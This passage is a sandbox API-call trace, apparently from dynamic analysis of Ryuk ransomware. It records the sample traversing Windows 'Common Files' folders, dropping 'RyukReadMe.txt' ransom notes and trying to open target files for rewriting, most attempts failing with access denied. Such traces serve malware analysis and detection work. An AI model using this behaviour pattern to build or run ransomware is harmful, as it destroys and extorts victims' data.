(dwErrCode=0x0) [0133.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.353] GetLastError () returned 0x5 [0133.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.353] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.353] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.353] SetLastError (dwErrCode=0x0) [0133.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.353] GetLastError () returned 0x5 [0133.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.353] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.353] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.353] SetLastError (dwErrCode=0x0) [0133.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.353] GetLastError () returned 0x5 [0133.354] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.354] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.354] SetLastError (dwErrCode=0x0) [0133.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.354] GetLastError () returned 0x5 [0133.354] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.354] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.354] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.354] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.354] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp", dwFileAttributes=0x80) returned 0 [0133.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.355] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.355] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.355] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.355] SetLastError (dwErrCode=0x0) [0133.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.355] GetLastError () returned 0x5 [0133.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.356] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.356] SetLastError (dwErrCode=0x0) [0133.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.356] GetLastError () returned 0x5 [0133.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.356] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.356] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.356] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.356] SetLastError (dwErrCode=0x0) [0133.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.356] GetLastError () returned 0x5 [0133.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.356] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.357] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.357] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.357] SetLastError (dwErrCode=0x0) [0133.357] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.357] GetLastError () returned 0x5 [0133.357] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.357] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.357] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.357] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.358] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.358] SetLastError (dwErrCode=0x0) [0133.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.358] GetLastError () returned 0x5 [0133.358] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.358] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0133.358] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.358] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.358] SetLastError (dwErrCode=0x0) [0133.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.358] GetLastError () returned 0x5 [0133.358] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0133.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.358] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0133.358] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0133.358] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0133.358] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0133.359] SetLastError (dwErrCode=0x0) [0133.359] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.359] GetLastError () returned 0x5 [0133.359] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0133.359] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.359] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.359] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.359] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0133.359] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0133.359] SetLastError (dwErrCode=0x0) [0133.359] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.359] GetLastError () returned 0x5 [0133.359] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.359] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.359] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.359] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.359] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.359] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.359] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.359] SetLastError (dwErrCode=0x0) [0133.359] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.359] GetLastError () returned 0x5 [0133.359] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.360] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.360] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.360] SetLastError (dwErrCode=0x0) [0133.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.360] GetLastError () returned 0x5 [0133.360] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.360] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.360] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.360] SetLastError (dwErrCode=0x0) [0133.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\speechengines\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.360] GetLastError () returned 0x5 [0133.360] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.360] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.360] SetLastError (dwErrCode=0x0) [0133.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.360] GetLastError () returned 0x5 [0133.360] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.360] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.362] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.362] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.362] SetLastError (dwErrCode=0x0) [0133.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.362] GetLastError () returned 0x5 [0133.362] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.364] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.364] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", dwFileAttributes=0x80) returned 0 [0133.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.365] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.365] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", dwFileAttributes=0x80) returned 0 [0133.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.366] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.366] SetLastError (dwErrCode=0x0) [0133.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ado\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.366] GetLastError () returned 0x5 [0133.366] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.366] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.366] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.366] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.366] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.366] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.366] SetLastError (dwErrCode=0x0) [0133.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.366] GetLastError () returned 0x5 [0133.366] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.366] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.366] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.366] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.366] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", dwFileAttributes=0x80) returned 0 [0133.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.367] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.367] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.367] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.367] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", dwFileAttributes=0x80) returned 0 [0133.368] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.368] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.368] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.368] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.368] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", dwFileAttributes=0x80) returned 0 [0133.368] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.368] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.368] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.369] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.369] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.369] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", dwFileAttributes=0x80) returned 0 [0133.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.369] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.369] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.370] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.370] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", 